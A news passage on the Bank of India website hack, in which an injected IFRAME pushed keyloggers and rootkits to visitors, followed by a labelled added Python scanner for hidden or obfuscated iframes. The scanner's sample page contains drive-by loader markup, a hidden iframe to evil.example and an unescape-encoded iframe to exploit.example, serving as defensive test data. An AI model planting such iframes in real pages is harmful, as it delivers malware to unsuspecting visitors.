Sunbelt learned that the site had become compromised while researching another malware issue. The company contacted the Bank of India, which shut the site down at about 2 a.m. EST Friday to clean the server, he said. The site is up and running again.
"We tracked communication with [the other malware] to the Bank of India site," Eckelberry said. "We're fairly certain this was done by the Russian Business Network (RBN), an underground criminal gang in Russia responsible for a lot of bad things on the internet."
The exploit appeared to be a malicious IFRAME, which took advantage of a Microsoft Windows 2003 server running the Bank of India site, he added. The IFRAME downloaded a wide variety of malware to PCs that had not been patched since August 2006, Eckelberry said.
Among the distributed malware were variants of TSPY_AGENT.AAVG and Trojan.Netview, several rootkits and a Trojan.Pandex. The first of these, TSPY_AGENT.AAVG, steals information from active windows on vulnerable end-user PCs, as well as information collected by a keylogger, network configuration, and user names and passwords for the POP3 and SMTP email protocols.
The collected files were uploaded to an FTP server in Russia, according to Sunbelt.
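The injected IFRAME described above is the classic drive-by loader of that period: a frame the visitor never sees, pointing at an exploit server on another host. The scanner below is added here as an illustration and is not code from Sunbelt, SC Magazine or the bank. It flags the tell-tale signs in a fetched page: a frame whose src points off the page's own host, a 0x0 or 1x1 frame, a frame hidden or pushed off-screen by CSS, and a frame emitted from a script through unescape('%3Ciframe...'), which a plain grep for "<iframe" never sees. The sample page and the hosts www.bank.example, evil.example and exploit.example are constructed for the example.

```python
"""Scan a page for iframes of the kind used in the Bank of India drive-by.

Added illustration (not Sunbelt's, SC Magazine's or the bank's code).
Injected loaders of that era were typically a 0x0 or display:none iframe
pointing at an exploit server on another host, sometimes written from a
script via unescape('%3Ciframe...') so a plain grep for "<iframe" misses it.
This scanner reports both forms.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

TINY_PX = 2  # a frame this small is not meant for a human to see

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
OFFSCREEN_STYLE = re.compile(r"(?:left|top)\s*:\s*-\d{3,}px", re.I)
UNESCAPE_CALL = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)", re.I)


def _px(value):
    """Pixel size from a width/height attribute ('0', '1px'); None for '100%' etc."""
    if value is None:
        return None
    m = re.fullmatch(r"\s*(\d+)(?:px)?\s*", value)
    return int(m.group(1)) if m else None


class _IframeScanner(HTMLParser):
    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []
        self._script = None  # buffer for the body of the <script> being read

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._script = []
            return
        if tag != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        reasons = []
        host = urlparse(src).hostname
        if host and host.lower() != self.page_host:
            reasons.append("off-origin src %s" % host)
        w, h = _px(a.get("width")), _px(a.get("height"))
        if (w is not None and w <= TINY_PX) or (h is not None and h <= TINY_PX):
            reasons.append("tiny frame %sx%s" % (a.get("width"), a.get("height")))
        style = a.get("style", "")
        if HIDDEN_STYLE.search(style):
            reasons.append("hidden by CSS")
        if OFFSCREEN_STYLE.search(style):
            reasons.append("positioned off-screen")
        if reasons:
            self.findings.append({"src": src, "reasons": reasons})

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag != "script" or self._script is None:
            return
        body, self._script = "".join(self._script), None
        # Decode unescape('%3Ciframe ...') arguments and scan what they would write.
        for m in UNESCAPE_CALL.finditer(body):
            decoded = unquote(m.group(1))
            if "<iframe" not in decoded.lower():
                continue
            sub = _IframeScanner(self.page_host)
            sub.feed(decoded)
            sub.close()
            for f in sub.findings:
                f["reasons"].append("written from obfuscated script")
                self.findings.append(f)


def find_suspicious_iframes(html, page_host):
    """Return [{'src': ..., 'reasons': [...]}] for iframes that look like drive-by loaders.

    page_host is the host the page was fetched from; any iframe pointing
    elsewhere, sized to be invisible, or hidden/off-screen via CSS is reported.
    """
    p = _IframeScanner(page_host)
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample, not the real Bank of India markup; hosts are hypothetical.
SAMPLE_PAGE = """<html><body>
<h1>Internet Banking</h1>
<iframe src="http://www.bank.example/rates.html" width="600" height="300"></iframe>
<iframe src="http://evil.example/in.cgi?3" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexploit.example%2Fx%2F%22%20width%3D1%20height%3D1%3E%3C%2Fiframe%3E'));</script>
</body></html>
"""

if __name__ == "__main__":
    for f in find_suspicious_iframes(SAMPLE_PAGE, "www.bank.example"):
        print(f["src"], "->", "; ".join(f["reasons"]))
```

Treat a hit as a lead rather than a verdict: legitimate pages embed third-party frames too, so each finding should be checked against what the site is supposed to serve. The visible 600x300 frame on the page's own host is not reported; the hidden 0x0 frame and the one decoded from the script are.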
"Bank of India had a hole in its systems, and the Russians took the opportunity to insert code into the page," Eckelberry said. "The same thing happened to the Super Bowl site earlier this year."